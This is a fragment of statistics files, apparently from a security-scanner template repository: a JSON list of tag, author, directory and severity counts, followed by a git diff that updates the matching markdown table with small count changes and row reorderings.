"name":"cve2008","count":2},{"name":"intrusive","count":2},{"name":"rockmongo","count":2},{"name":"seeyon","count":2},{"name":"proxy","count":2},{"name":"nexus","count":2},{"name":"zhiyuan","count":2},{"name":"sonarqube","count":2},{"name":"huawei","count":2},{"name":"plesk","count":2},{"name":"injection","count":2},{"name":"vrealize","count":2},{"name":"httpd","count":2},{"name":"natshell","count":2},{"name":"hashicorp","count":2},{"name":"pega","count":2},{"name":"hjtcloud","count":2},{"name":"ecology","count":2},{"name":"coldfusion","count":2},{"name":"trixbox","count":2},{"name":"rstudio","count":2},{"name":"sonicwall","count":2},{"name":"ucmdb","count":2},{"name":"exposures","count":2},{"name":"mail","count":2},{"name":"service","count":2},{"name":"couchdb","count":2},{"name":"fortios","count":2},{"name":"openfire","count":2},{"name":"mida","count":2},{"name":"icewarp","count":2},{"name":"leak","count":2},{"name":"yapi","count":2},{"name":"jboss","count":2},{"name":"cache","count":2},{"name":"dos","count":2},{"name":"prometheus","count":2},{"name":"bigip","count":2},{"name":"telerik","count":2},{"name":"rockethchat","count":2},{"name":"paloalto","count":2},{"name":"activemq","count":2},{"name":"microsoft","count":2},{"name":"flir","count":2},{"name":"xxljob","count":2},{"name":"idrac","count":2},{"name":"odoo","count":2},{"name":"kibana","count":2},{"name":"emerge","count":2},{"name":"strapi","count":2},{"name":"globalprotect","count":2},{"name":"maian","count":2},{"name":"webcam","count":2},{"name":"wordfence","count":2},{"name":"openam","count":2},{"name":"nextjs","count":2},{"name":"chamilo","count":2},{"name":"splunk","count":2},{"name":"keycloak","count":2},{"name":"showdoc","count":2},{"name":"sharepoint","count":2},{"name":"shellshock","count":2},{"name":"zabbix","count":2},{"name":"hpe","count":2},{"name":"smtp","count":2},{"name":"smb","count":2},{"name":"frp","count":2},{"name":"hp","count":2},{"name":"saltstack","count":2},{"name":"spark","count":2},{"name":"kentico","count":2},{"name":"glassfish","count":2},{"name":"waf","count":2},{"name":"jellyfin","count":2},{"name":"voipmonitor","count":2},{"name":"bitrix","count":2},{"name":"nagios","count":2},{"name":"oauth","count":2},{"name":"synnefo","count":1},{"name":"jsp","count":1},{"name":"salesforce","count":1},{"name":"myucms","count":1},{"name":"postgres","count":1},{"name":"octobercms","count":1},{"name":"dotnet","count":1},{"name":"landray","count":1},{"name":"mediumish","count":1},{"name":"portainer","count":1},{"name":"spectracom","count":1},{"name":"tpshop","count":1},{"name":"node-red-dashboard","count":1},{"name":"cloudflare","count":1},{"name":"cocoon","count":1},{"name":"plugin","count":1},{"name":"zookeeper","count":1},{"name":"faraday","count":1},{"name":"ec2","count":1},{"name":"zm","count":1},{"name":"visionhub","count":1},{"name":"uwsgi","count":1},{"name":"bruteforce","count":1},{"name":"selea","count":1},{"name":"mongo","count":1},{"name":"javamelody","count":1},{"name":"idemia","count":1},{"name":"emby","count":1},{"name":"sco","count":1},{"name":"horde","count":1},{"name":"symfony","count":1},{"name":"netdata","count":1},{"name":"mcafee","count":1},{"name":"opm","count":1},{"name":"zeroshell","count":1},{"name":"email","count":1},{"name":"geddy","count":1},{"name":"centos","count":1},{"name":"jquery","count":1},{"name":"esmtp","count":1},{"name":"chinaunicom","count":1},{"name":"smartsense","count":1},{"name":"metinfo","count":1},{"name":"wavemaker","count":1},{"name":"erp-nc","count":1},{"name":"domxss","count":1},{"name":"ntopng","count":1},{"name":"exchange","count":1},{"name":"wazuh","count":1},{"name":"tapestry","count":1},{"name":"cve2005","count":1},{"name":"mantisbt","count":1},{"name":"status","count":1},{"name":"mirai","count":1},{"name":"viewpoint","count":1},{"name":"realteo","count":1},{"name":"empirecms","count":1},{"name":"rmc","count":1},{"name":"clave","count":1},{"name":"discourse","count":1},{"name":"xdcms","count":1},{"name":"razor","count":1},{"name":"turbocrm","count":1},{"name":"extractor","count":1},{"name":"nc2","count":1},{"name":"yachtcontrol","count":1},{"name":"huijietong","count":1},{"name":"szhe","count":1},{"name":"vsphere","count":1},{"name":"rabbitmq","count":1},{"name":"cse","count":1},{"name":"apiman","count":1},{"name":"pgadmin","count":1},{"name":"xiuno","count":1},{"name":"axis","count":1},{"name":"landrayoa","count":1},{"name":"rsyncd","count":1},{"name":"fiori","count":1},{"name":"nsasg","count":1},{"name":"diris","count":1},{"name":"etouch","count":1},{"name":"zzzcms","count":1},{"name":"beanshell","count":1},{"name":"cors","count":1},{"name":"timeclock","count":1},{"name":"tileserver","count":1},{"name":"rfi","count":1},{"name":"stem","count":1},{"name":"javascript","count":1},{"name":"hasura","count":1},{"name":"fastcgi","count":1},{"name":"jeewms","count":1},{"name":"expn","count":1},{"name":"firebase","count":1},{"name":"2014","count":1},{"name":"cgi","count":1},{"name":"triconsole","count":1},{"name":"avalanche","count":1},{"name":"primetek","count":1},{"name":"tamronos","count":1},{"name":"enumeration","count":1},{"name":"hadoop","count":1},{"name":"netrc","count":1},{"name":"pacsone","count":1},{"name":"itop","count":1},{"name":"pippoint","count":1},{"name":"phpinfo","count":1},{"name":"fortigate","count":1},{"name":"linksys","count":1},{"name":"cve2010","count":1},{"name":"pulsesecure","count":1},{"name":"acexy","count":1},{"name":"wifisky","count":1},{"name":"krweb","count":1},{"name":"panabit","count":1},{"name":"spf","count":1},{"name":"svn","count":1},{"name":"kyan","count":1},{"name":"moinmoin","count":1},{"name":"ulterius","count":1},{"name":"cobub","count":1},{"name":"svnserve","count":1},{"name":"dotnetnuke","count":1},{"name":"mpsec","count":1},{"name":"lotuscms","count":1},{"name":"nps","count":1},{"name":"majordomo2","count":1},{"name":"ruby","count":1},{"name":"plc","count":1},{"name":"skywalking","count":1},{"name":"opencast","count":1},{"name":"saltapi","count":1},{"name":"ricoh","count":1},{"name":"cve2007","count":1},{"name":"openerp","count":1},{"name":"azure","count":1},{"name":"oscommerce","count":1},{"name":"dlogin","count":1},{"name":"webftp","count":1},{"name":"blue-ocean","count":1},{"name":"dom","count":1},{"name":"sqlite","count":1},{"name":"robomongo","count":1},{"name":"appweb","count":1},{"name":"shopware","count":1},{"name":"linkedin","count":1},{"name":"adminer","count":1},{"name":"ssltls","count":1},{"name":"glances","count":1},{"name":"socomec","count":1},{"name":"parentlink","count":1},{"name":"klog","count":1},{"name":"wso2","count":1},{"name":"nordex","count":1},{"name":"mautic","count":1},{"name":"nette","count":1},{"name":"wp-theme","count":1},{"name":"wooyun","count":1},{"name":"viewlinc","count":1},{"name":"redhat","count":1},{"name":"gloo","count":1},{"name":"nuxeo","count":1},{"name":"jfrog","count":1},{"name":"optiLink","count":1},{"name":"xunchi","count":1},{"name":"vsftpd","count":1},{"name":"xff","count":1},{"name":"nomad","count":1},{"name":"csrf","count":1},{"name":"favicon","count":1},{"name":"rhymix","count":1},{"name":"redwood","count":1},{"name":"ambari","count":1},{"name":"maccmsv10","count":1},{"name":"scs","count":1},{"name":"ns","count":1},{"name":"bitly","count":1},{"name":"openstack","count":1},{"name":"haproxy","count":1},{"name":"clockwatch","count":1},{"name":"aspnuke","count":1},{"name":"fedora","count":1},{"name":"pyramid","count":1},{"name":"memcached","count":1},{"name":"linkerd","count":1},{"name":"ems","count":1},{"name":"woocomernce","count":1},{"name":"wmt","count":1},{"name":"mysql","count":1},{"name":"interlib","count":1},{"name":"timesheet","count":1},{"name":"alerta","count":1},{"name":"enum","count":1},{"name":"ioncube","count":1},{"name":"biometrics","count":1},{"name":"nexusdb","count":1},{"name":"acme","count":1},{"name":"octoprint","count":1},{"name":"floc","count":1},{"name":"kubeflow","count":1},{"name":"swagger","count":1},{"name":"arl","count":1},{"name":"sprintful","count":1},{"name":"ssl","count":1},{"name":"zcms","count":1},{"name":"calendarix","count":1},{"name":"dvr","count":1},{"name":"druid","count":1},{"name":"jmx","count":1},{"name":"spidercontrol","count":1},{"name":"sidekiq","count":1},{"name":"tensorboard","count":1},{"name":"k8","count":1},{"name":"bullwark","count":1},{"name":"upload","count":1},{"name":"rubedo","count":1},{"name":"openrestry","count":1},{"name":"grails","count":1},{"name":"jnoj","count":1},{"name":"javafaces","count":1},{"name":"traefik","count":1},{"name":"xml","count":1},{"name":"soar","count":1},{"name":"springframework","count":1},{"name":"sarg","count":1},{"name":"mdb","count":1},{"name":"sentry","count":1},{"name":"codeigniter","count":1},{"name":"k8s","count":1},{"name":"jenzabar","count":1},{"name":"zimbra","count":1},{"name":"embedthis","count":1},{"name":"phalcon","count":1},{"name":"fortiweb","count":1},{"name":"clusterengine","count":1},{"name":"tika","count":1},{"name":"gogs","count":1},{"name":"seacms","count":1},{"name":"payara","count":1},{"name":"bookstack","count":1},{"name":"aura","count":1},{"name":"nedi","count":1},{"name":"fuelcms","count":1},{"name":"fortigates","count":1},{"name":"avtech","count":1},{"name":"labtech","count":1},{"name":"discord","count":1},{"name":"anchorcms","count":1},{"name":"mailchimp","count":1},{"name":"kafdrop","count":1},{"name":"livezilla","count":1},{"name":"darkstat","count":1},{"name":"codemeter","count":1},{"name":"hortonworks","count":1},{"name":"crm","count":1},{"name":"opensmtpd","count":1},{"name":"sitecore","count":1},{"name":"node","count":1},{"name":"mongoshake","count":1},{"name":"db","count":1},{"name":"servicedesk","count":1},{"name":"wamp","count":1},{"name":"alibaba","count":1},{"name":"fortinet","count":1},{"name":"blackboard","count":1},{"name":"redis","count":1},{"name":"tongda","count":1},{"name":"plastic","count":1},{"name":"dompdf","count":1},{"name":"circontrol","count":1},{"name":"checkpoint","count":1},{"name":"harbor","count":1},{"name":"dvwa","count":1},{"name":"zmanda","count":1},{"name":"st","count":1},{"name":"csod","count":1},{"name":"duomicms","count":1},{"name":"rdp","count":1},{"name":"comodo","count":1},{"name":"episerver","count":1},{"name":"opentsdb","count":1},{"name":"servicenow","count":1},{"name":"igs","count":1},{"name":"setup","count":1},{"name":"kong","count":1},{"name":"eyou","count":1},{"name":"wuzhicms","count":1},{"name":"trilithic","count":1},{"name":"geutebruck","count":1},{"name":"blind","count":1},{"name":"targa","count":1},{"name":"fastapi","count":1},{"name":"circontrorl","count":1},{"name":"kerbynet","count":1},{"name":"upnp","count":1},{"name":"b2evolution","count":1},{"name":"zarafa","count":1},{"name":"netis","count":1},{"name":"mobileiron","count":1},{"name":"keenetic","count":1},{"name":"moin","count":1},{"name":"phpunit","count":1},{"name":"htmli","count":1},{"name":"wildfly","count":1},{"name":"heroku","count":1},{"name":"wiki","count":1},{"name":"cloudinary","count":1},{"name":"tenda","count":1},{"name":"thinkadmin","count":1},{"name":"webui","count":1},{"name":"jsf","count":1},{"name":"gridx","count":1},{"name":"zend","count":1},{"name":"akamai","count":1},{"name":"gitlist","count":1},{"name":"nuuo","count":1},{"name":"doh","count":1},{"name":"74cms","count":1},{"name":"proftpd","count":1},{"name":"starttls","count":1},{"name":"ganglia","count":1},{"name":"tensorflow","count":1},{"name":"jitsi","count":1},{"name":"plone","count":1},{"name":"bash","count":1},{"name":"zenario","count":1},{"name":"monitorix","count":1},{"name":"ecom","count":1},{"name":"yii","count":1},{"name":"webmin","count":1},{"name":"webadmin","count":1},{"name":"ueditor","count":1},{"name":"lancom","count":1},{"name":"lanproxy","count":1},{"name":"concrete","count":1},{"name":"ilo4","count":1},{"name":"goahead","count":1},{"name":"opensns","count":1},{"name":"grav","count":1},{"name":"bolt","count":1},{"name":"netsweeper","count":1},{"name":"totaljs","count":1},{"name":"feifeicms","count":1},{"name":"flink","count":1},{"name":"finereport","count":1},{"name":"rujjie","count":1},{"name":"webmodule-ee","count":1},{"name":"fortilogger","count":1},{"name":"spring","count":1},{"name":"lansweeper","count":1},{"name":"flash","count":1},{"name":"weiphp","count":1},{"name":"vscode","count":1},{"name":"varnish","count":1},{"name":"npm","count":1},{"name":"emc","count":1},{"name":"drone","count":1},{"name":"alertmanager","count":1},{"name":"gateone","count":1},{"name":"mara","count":1},{"name":"shopxo","count":1},{"name":"jenkin","count":1},{"name":"subrion","count":1},{"name":"rmi","count":1},{"name":"powercreator","count":1},{"name":"postmessage","count":1},{"name":"liferay","count":1},{"name":"backdoor","count":1},{"name":"panos","count":1},{"name":"zte","count":1}],"authors":[{"name":"dhiyaneshdk","count":202},{"name":"pdteam","count":184},{"name":"pikpikcu","count":177},{"name":"dwisiswant0","count":113},{"name":"geeknik","count":88},{"name":"daffainfo","count":79},{"name":"madrobot","count":59},{"name":"princechaddha","count":50},{"name":"gaurang","count":42},{"name":"gy741","count":35},{"name":"ice3man","count":26},{"name":"pussycat0x","count":25},{"name":"0x_akoko","count":20},{"name":"organiccrap","count":19},{"name":"sheikhrishad","count":15},{"name":"milo2012","count":13},{"name":"techbrunchfr","count":13},{"name":"pr3r00t","count":12},{"name":"suman_kar","count":12},{"name":"cyllective","count":11},{"name":"random_robbie","count":10},{"name":"righettod","count":9},{"name":"nadino","count":8},{"name":"hackergautam","count":8},{"name":"aashiq","count":8},{"name":"wdahlenb","count":8},{"name":"iamthefrogy","count":8},{"name":"harshbothra_","count":7},{"name":"oppsec","count":7},{"name":"randomstr1ng","count":7},{"name":"melbadry9","count":7},{"name":"0x240x23elu","count":7},{"name":"techryptic (@tech)","count":7},{"name":"emadshanab","count":7},{"name":"that_juan_","count":7},{"name":"r3dg33k","count":7},{"name":"dr_set","count":7},{"name":"philippedelteil","count":6},{"name":"__fazal","count":6},{"name":"puzzlepeaches","count":5},{"name":"pentest_swissky","count":5},{"name":"caspergn","count":5},{"name":"yanyun","count":5},{"name":"panch0r3d","count":5},{"name":"ganofins","count":5},{"name":"rootxharsh","count":4},{"name":"nodauf","count":4},{"name":"e_schultze_","count":4},{"name":"github.com/its0x08","count":4},{"name":"xelkomy","count":4},{"name":"meme-lord","count":4},{"name":"iamnoooob","count":4},{"name":"impramodsargar","count":3},{"name":"binaryfigments","count":3},{"name":"tess","count":3},{"name":"shine","count":3},{"name":"kophjager007","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"joanbono","count":3},{"name":"fyoorer","count":3},{"name":"z3bd","count":3},{"name":"thomas_from_offensity","count":3},{"name":"f1tz","count":3},{"name":"0w4ys","count":3},{"name":"davidmckennirey","count":2},{"name":"incogbyte","count":2},{"name":"kiblyn11","count":2},{"name":"0xcrypto","count":2},{"name":"emenalf","count":2},{"name":"0xelkomy","count":2},{"name":"zomsop82","count":2},{"name":"0xsapra","count":2},{"name":"joeldeleep","count":2},{"name":"shifacyclewala","count":2},{"name":"gevakun","count":2},{"name":"0xprial","count":2},{"name":"mavericknerd","count":2},{"name":"foulenzer","count":2},{"name":"elsfa7110","count":2},{"name":"ehsahil","count":2},{"name":"moritz nentwig","count":2},{"name":"jarijaas","count":2},{"name":"lu4nx","count":2},{"name":"dheerajmadhukar","count":2},{"name":"manas_harsh","count":2},{"name":"bsysop","count":2},{"name":"unstabl3","count":2},{"name":"ree4pwn","count":2},{"name":"pxmme1337","count":2},{"name":"swissky","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"lotusdll","count":2},{"name":"bp0lr","count":2},{"name":"vavkamil","count":2},{"name":"afaq","count":2},{"name":"x1m_martijn","count":2},{"name":"hetroublemakr","count":2},{"name":"randomrobbie","count":2},{"name":"0xrudra","count":2},{"name":"udit_thakkur","count":2},{"name":"random-robbie","count":2},{"name":"amsda","count":2},{"name":"daviey","count":1},{"name":"_generic_human_","count":1},{"name":"0ut0fb4nd","count":1},{"name":"nkxxkn","count":1},{"name":"j33n1k4","count":1},{"name":"tim_koopmans","count":1},{"name":"naglinagli","count":1},{"name":"koti2","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"notsoevilweasel","count":1},{"name":"pdp","count":1},{"name":"geraldino2","count":1},{"name":"shelld3v","count":1},{"name":"deena","count":1},{"name":"regala_","count":1},{"name":"bjhulst","count":1},{"name":"yashgoti","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"alifathi-h1","count":1},{"name":"dogasantos","count":1},{"name":"pudsec","count":1},{"name":"shreyapohekar","count":1},{"name":"zhenwarx","count":1},{"name":"smaranchand","count":1},{"name":"elmahdi","count":1},{"name":"kabirsuda","count":1},{"name":"luskabol","count":1},{"name":"akshansh","count":1},{"name":"divya_mudgal","count":1},{"name":"alperenkesk","count":1},{"name":"@dwisiswant0","count":1},{"name":"rojanrijal","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"_harleo","count":1},{"name":"yashanand155","count":1},{"name":"ilovebinbash","count":1},{"name":"0xtavian","count":1},{"name":"raesene","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"defr0ggy","count":1},{"name":"ohlinge","count":1},{"name":"juicypotato1","count":1},{"name":"flag007","count":1},{"name":"furkansenan","count":1},{"name":"rtcms","count":1},{"name":"sicksec","count":1},{"name":"andirrahmani1","count":1},{"name":"jeya seelan","count":1},{"name":"kareemse1im","count":1},{"name":"52971","count":1},{"name":"yavolo","count":1},{"name":"johnk3r","count":1},{"name":"schniggie","count":1},{"name":"shifacyclewla","count":1},{"name":"its0x08","count":1},{"name":"mah3sec_","count":1},{"name":"mhdsamx","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"absshax","count":1},{"name":"sickwell","count":1},{"name":"fabaff","count":1},{"name":"nytr0gen","count":1},{"name":"ooooooo_q","count":1},{"name":"alph4byt3","count":1},{"name":"gboddin","count":1},{"name":"_darrenmartyn","count":1},{"name":"manuelbua","count":1},{"name":"exploitation","count":1},{"name":"dudez","count":1},{"name":"iampritam","count":1},{"name":"g4l1t0 and @convisoappsec","count":1},{"name":"rodnt","count":1},{"name":"sshell","count":1},{"name":"bad5ect0r","count":1},{"name":"johnjhacking","count":1},{"name":"alex","count":1},{"name":"fmunozs","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"sy3omda","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"vsh00t","count":1},{"name":"noamrathaus","count":1},{"name":"berkdusunur","count":1},{"name":"s1r1u5_","count":1},{"name":"knassar702","count":1},{"name":"_c0wb0y_","count":1},{"name":"fopina","count":1},{"name":"wabafet","count":1},{"name":"mohammedsaneem","count":1},{"name":"qlkwej","count":1},{"name":"ldionmarcil","count":1},{"name":"hanlaomo","count":1},{"name":"micha3lb3n","count":1},{"name":"soyelmago","count":1},{"name":"sushant kamble (https://in.linkedin.com/in/sushantkamble)","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"willd96","count":1},{"name":"apt-mirror","count":1},{"name":"omarkurt","count":1},{"name":"thezakman","count":1},{"name":"d0rkerdevil","count":1},{"name":"ringo","count":1},{"name":"becivells","count":1},{"name":"tirtha_mandal","count":1},{"name":"streetofhackerr007","count":1},{"name":"ipanda","count":1},{"name":"dawid czarnecki","count":1},{"name":"ajaysenr","count":1},{"name":"cookiehanhoan","count":1},{"name":"th3.d1p4k","count":1},{"name":"blckraven","count":1},{"name":"kurohost","count":1},{"name":"c3l3si4n","count":1},{"name":"mubassirpatel","count":1},{"name":"toufik airane","count":1},{"name":"whynotke","count":1},{"name":"abison_binoy","count":1},{"name":"bing0o","count":1},{"name":"bolli95","count":1},{"name":"undefl0w","count":1},{"name":"remonsec","count":1},{"name":"0h1in9e","count":1},{"name":"taielab","count":1},{"name":"affix","count":1},{"name":"idealphase","count":1},{"name":"zandros0","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"gal nagli","count":1},{"name":"luci","count":1},{"name":"ahmed sherif","count":1},{"name":"thevillagehacker","count":1},{"name":"vzamanillo","count":1},{"name":"0xrod","count":1},{"name":"co0nan","count":1},{"name":"hakluke","count":1},{"name":"patralos","count":1},{"name":"chron0x","count":1},{"name":"r3naissance","count":1},{"name":"w4cky_","count":1},{"name":"akash.c","count":1},{"name":"b4uh0lz","count":1},{"name":"arcc","count":1},{"name":"sullo","count":1}],"directory":[{"name":"cves","count":470},{"name":"vulnerabilities","count":232},{"name":"exposed-panels","count":202},{"name":"exposures","count":150},{"name":"technologies","count":129},{"name":"misconfiguration","count":114},{"name":"takeovers","count":70},{"name":"default-logins","count":44},{"name":"file","count":42},{"name":"workflows","count":33},{"name":"miscellaneous","count":27},{"name":"network","count":25},{"name":"iot","count":18},{"name":"fuzzing","count":10},{"name":"dns","count":10},{"name":"cnvd","count":9},{"name":"headless","count":5},{"name":".pre-commit-config.yaml","count":1}],"severity":[{"name":"info","count":453},{"name":"high","count":395},{"name":"medium","count":313},{"name":"critical","count":186},{"name":"low","count":150}],"types":[{"name":"http","count":1408},{"name":"file","count":42},{"name":"network","count":32},{"name":"dns","count":10}]} diff --git a/TEMPLATES-STATS.md b/TEMPLATES-STATS.md index 7fcd055cf6..2127d6d969 100644 --- a/TEMPLATES-STATS.md +++ b/TEMPLATES-STATS.md @@ -1,602 +1,601 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |--------------------|-------|--------------------------------------------|-------|-------------------------|-------|----------|-------|---------|-------| -| cve | 462 | dhiyaneshdk | 202 | cves | 468 | info | 453 | http | 1408 | -| panel | 201 | pdteam | 184 | vulnerabilities | 234 | high | 396 | file | 42 | -| xss | 168 | pikpikcu | 177 | exposed-panels | 202 | medium | 312 | network | 32 | -| wordpress | 166 | dwisiswant0 | 113 | exposures | 150 | critical | 186 | dns | 10 | +| cve | 464 | dhiyaneshdk | 202 | cves | 470 | info | 453 | http | 1408 | +| panel | 201 | pdteam | 184 | vulnerabilities | 232 | high | 395 | file | 42 | +| xss | 168 | pikpikcu | 177 | exposed-panels | 202 | medium | 313 | network | 32 | +| wordpress | 165 | dwisiswant0 | 113 | exposures | 150 | critical | 186 | dns | 10 | | rce | 161 | geeknik | 88 | technologies | 129 | low | 150 | | | -| exposure | 154 | daffainfo | 78 | misconfiguration | 114 | | | | | +| exposure | 154 | daffainfo | 79 | misconfiguration | 114 | | | | | | cve2020 | 135 | madrobot | 59 | takeovers | 70 | | | | | | lfi | 127 | princechaddha | 50 | default-logins | 44 | | | | | -| wp-plugin | 111 | gaurang | 42 | file | 42 | | | | | +| wp-plugin | 110 | gaurang | 42 | file | 42 | | | | | | cve2019 | 82 | gy741 | 35 | workflows | 33 | | | | | | config | 81 | ice3man | 26 | miscellaneous | 27 | | | | | | tech | 72 | pussycat0x | 25 | network | 25 | | | | | | takeover | 71 | 0x_akoko | 20 | iot | 18 | | | | | -| cve2021 | 70 | organiccrap | 19 | fuzzing | 10 | | | | | -| token | 63 | sheikhrishad | 15 | dns | 10 | | | | | -| cve2018 | 61 | techbrunchfr | 13 | cnvd | 9 | | | | | -| apache | 60 | milo2012 | 13 | headless | 5 | | | | | -| default-login | 45 | pr3r00t | 12 | .pre-commit-config.yaml | 1 | | | | | -| cve2017 | 43 | suman_kar | 12 | | | | | | | +| cve2021 | 71 | organiccrap | 19 | dns | 10 | | | | | +| token | 63 | sheikhrishad | 15 | fuzzing | 10 | | | | | +| cve2018 | 62 | milo2012 | 13 | cnvd | 9 | | | | | +| apache | 60 | techbrunchfr | 13 | headless | 5 | | | | | +| default-login | 45 | suman_kar | 12 | .pre-commit-config.yaml | 1 | | | | | +| cve2017 | 43 | pr3r00t | 12 | | | | | | | | file | 42 | cyllective | 11 | | | | | | | | unauth | 39 | random_robbie | 10 | | | | | | | -| network | 32 | righettod | 9 | | | | | | | -| iot | 32 | aashiq | 8 | | | | | | | +| iot | 33 | righettod | 9 | | | | | | | +| network | 32 | iamthefrogy | 8 | | | | | | | +| sqli | 29 | hackergautam | 8 | | | | | | | | oracle | 29 | wdahlenb | 8 | | | | | | | -| sqli | 29 | iamthefrogy | 8 | | | | | | | | workflow | 28 | nadino | 8 | | | | | | | -| misc | 27 | hackergautam | 8 | | | | | | | -| atlassian | 26 | 0x240x23elu | 7 | | | | | | | -| jira | 25 | harshbothra_ | 7 | | | | | | | -| ssrf | 25 | r3dg33k | 7 | | | | | | | -| logs | 24 | techryptic (@tech) | 7 | | | | | | | +| misc | 27 | aashiq | 8 | | | | | | | +| atlassian | 26 | randomstr1ng | 7 | | | | | | | +| jira | 25 | oppsec | 7 | | | | | | | +| ssrf | 25 | dr_set | 7 | | | | | | | +| oob | 24 | techryptic (@tech) | 7 | | | | | | | +| logs | 24 | r3dg33k | 7 | | | | | | | | disclosure | 24 | that_juan_ | 7 | | | | | | | -| oob | 24 | emadshanab | 7 | | | | | | | -| redirect | 20 | randomstr1ng | 7 | | | | | | | +| redirect | 20 | 0x240x23elu | 7 | | | | | | | | aem | 18 | melbadry9 | 7 | | | | | | | -| listing | 15 | dr_set | 7 | | | | | | | -| cisco | 15 | oppsec | 7 | | | | | | | -| sap | 14 | __fazal | 6 | | | | | | | +| listing | 15 | emadshanab | 7 | | | | | | | +| cisco | 15 | harshbothra_ | 7 | | | | | | | | cve2016 | 14 | philippedelteil | 6 | | | | | | | +| sap | 14 | __fazal | 6 | | | | | | | +| misconfig | 13 | puzzlepeaches | 5 | | | | | | | +| fuzz | 13 | caspergn | 5 | | | | | | | +| cve2015 | 13 | panch0r3d | 5 | | | | | | | +| struts | 13 | pentest_swissky | 5 | | | | | | | | debug | 13 | ganofins | 5 | | | | | | | -| misconfig | 13 | yanyun | 5 | | | | | | | -| cve2015 | 13 | pentest_swissky | 5 | | | | | | | -| struts | 13 | caspergn | 5 | | | | | | | -| android | 12 | puzzlepeaches | 5 | | | | | | | -| weblogic | 12 | panch0r3d | 5 | | | | | | | -| fuzz | 12 | meme-lord | 4 | | | | | | | -| dns | 11 | github.com/its0x08 | 4 | | | | | | | -| auth-bypass | 11 | e_schultze_ | 4 | | | | | | | -| zoho | 11 | nodauf | 4 | | | | | | | -| springboot | 11 | xelkomy | 4 | | | | | | | -| devops | 10 | iamnoooob | 4 | | | | | | | +| android | 12 | yanyun | 5 | | | | | | | +| weblogic | 12 | github.com/its0x08 | 4 | | | | | | | +| auth-bypass | 11 | nodauf | 4 | | | | | | | +| springboot | 11 | e_schultze_ | 4 | | | | | | | +| zoho | 11 | meme-lord | 4 | | | | | | | +| dns | 11 | iamnoooob | 4 | | | | | | | | cve2011 | 10 | rootxharsh | 4 | | | | | | | -| cve2012 | 9 | binaryfigments | 3 | | | | | | | -| dlink | 9 | impramodsargar | 3 | | | | | | | -| magento | 9 | z3bd | 3 | | | | | | | -| jenkins | 9 | kophjager007 | 3 | | | | | | | -| airflow | 8 | fyoorer | 3 | | | | | | | -| cnvd | 8 | 0w4ys | 3 | | | | | | | +| devops | 10 | xelkomy | 4 | | | | | | | +| jenkins | 9 | binaryfigments | 3 | | | | | | | +| dlink | 9 | fyoorer | 3 | | | | | | | +| cve2012 | 9 | f1tz | 3 | | | | | | | +| magento | 9 | 0w4ys | 3 | | | | | | | +| adobe | 8 | impramodsargar | 3 | | | | | | | | ftp | 8 | shine | 3 | | | | | | | -| cve2013 | 8 | f1tz | 3 | | | | | | | -| aws | 8 | yash anand @yashanand155 | 3 | | | | | | | -| gitlab | 8 | tess | 3 | | | | | | | -| adobe | 8 | thomas_from_offensity | 3 | | | | | | | -| php | 8 | joanbono | 3 | | | | | | | -| cve2014 | 7 | 0xprial | 2 | | | | | | | -| joomla | 7 | kiblyn11 | 2 | | | | | | | -| vmware | 7 | zomsop82 | 2 | | | | | | | -| scada | 7 | bsysop | 2 | | | | | | | -| cms | 6 | davidmckennirey | 2 | | | | | | | -| nginx | 6 | 0xcrypto | 2 | | | | | | | -| rails | 6 | pxmme1337 | 2 | | | | | | | -| google | 6 | amsda | 2 | | | | | | | -| api | 6 | manas_harsh | 2 | | | | | | | -| backup | 6 | joeldeleep | 2 | | | | | | | -| citrix | 6 | hetroublemakr | 2 | | | | | | | -| rconfig | 6 | random-robbie | 2 | | | | | | | -| xxe | 6 | lotusdll | 2 | | | | | | | -| drupal | 5 | mavericknerd | 2 | | | | | | | -| solr | 5 | 0xrudra | 2 | | | | | | | -| circarlife | 5 | jarijaas | 2 | | | | | | | -| dell | 5 | 0xsapra | 2 | | | | | | | -| headless | 5 | incogbyte | 2 | | | | | | | -| lucee | 5 | unstabl3 | 2 | | | | | | | -| laravel | 5 | udit_thakkur | 2 | | | | | | | +| php | 8 | z3bd | 3 | | | | | | | +| airflow | 8 | thomas_from_offensity | 3 | | | | | | | +| aws | 8 | kophjager007 | 3 | | | | | | | +| cve2013 | 8 | joanbono | 3 | | | | | | | +| gitlab | 8 | yash anand @yashanand155 | 3 | | | | | | | +| cnvd | 8 | tess | 3 | | | | | | | +| cve2014 | 7 | hetroublemakr | 2 | | | | | | | +| joomla | 7 | mavericknerd | 2 | | | | | | | +| vmware | 7 | ree4pwn | 2 | | | | | | | +| scada | 7 | x1m_martijn | 2 | | | | | | | +| xxe | 6 | mahendra purbia (mah3sec_) | 2 | | | | | | | +| cms | 6 | incogbyte | 2 | | | | | | | +| backup | 6 | vavkamil | 2 | | | | | | | +| rails | 6 | gevakun | 2 | | | | | | | +| google | 6 | manas_harsh | 2 | | | | | | | +| api | 6 | afaq | 2 | | | | | | | +| nginx | 6 | random-robbie | 2 | | | | | | | +| citrix | 6 | kiblyn11 | 2 | | | | | | | +| rconfig | 6 | moritz nentwig | 2 | | | | | | | +| dell | 5 | amsda | 2 | | | | | | | +| login | 5 | lu4nx | 2 | | | | | | | +| phpmyadmin | 5 | bp0lr | 2 | | | | | | | +| iis | 5 | unstabl3 | 2 | | | | | | | +| ssti | 5 | lotusdll | 2 | | | | | | | +| confluence | 5 | dheerajmadhukar | 2 | | | | | | | +| jetty | 5 | udit_thakkur | 2 | | | | | | | +| headless | 5 | 0xcrypto | 2 | | | | | | | +| java | 5 | 0xrudra | 2 | | | | | | | +| solr | 5 | emenalf | 2 | | | | | | | +| lucee | 5 | elsfa7110 | 2 | | | | | | | +| circarlife | 5 | davidmckennirey | 2 | | | | | | | +| laravel | 5 | shifacyclewala | 2 | | | | | | | | ruijie | 5 | swissky | 2 | | | 